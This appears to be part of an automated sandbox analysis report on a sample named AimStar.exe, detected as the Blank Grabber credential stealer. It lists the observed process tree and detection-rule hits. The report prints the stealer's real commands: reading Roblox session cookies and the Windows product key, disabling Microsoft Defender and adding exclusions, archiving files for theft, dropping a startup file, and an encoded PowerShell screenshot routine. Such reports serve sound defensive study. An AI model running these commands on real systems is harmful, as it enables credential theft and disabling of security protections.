      • cmd.exe (PID: 8040 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8044 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7784 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7988 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7396 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7652 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8012 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7764 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8064 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 7484 cmdline: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 368 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3116 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7320 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7392 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8036 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7768 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8088 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7784 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5652 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7608 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5700 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7496 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI72842\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2021999995.00000192BB8F5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2021999995.00000192BB8F3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          Process Memory Space: AimStar.exe PID: 7284JoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            Process Memory Space: AimStar.exe PID: 7332JoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 2 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\AimStar.exe", ParentImage: C:\Users\user\Desktop\AimStar.exe, ParentProcessId: 7332, ParentProcessName: AimStar.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'", ProcessId: 7392, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\AimStar.exe", ParentImage: C:\Users\user\Desktop\AimStar.exe, ParentProcessId: 7332, ParentProcessName: AimStar.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7400, ProcessName: cmd.exe
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\AimStar.exe", ParentImage: C:\Users\user\Desktop\AimStar.exe, ParentProcessId: 7332, ParentProcessName: AimStar.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *", ProcessId: 8064, ProcessName: cmd.exe
              Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7392, StartAddress: C76632B0, TargetImage: C:\Windows\System32\cmd.exe, TargetProcessId: 7392
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\AimStar.exe, ProcessId: 7332, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAA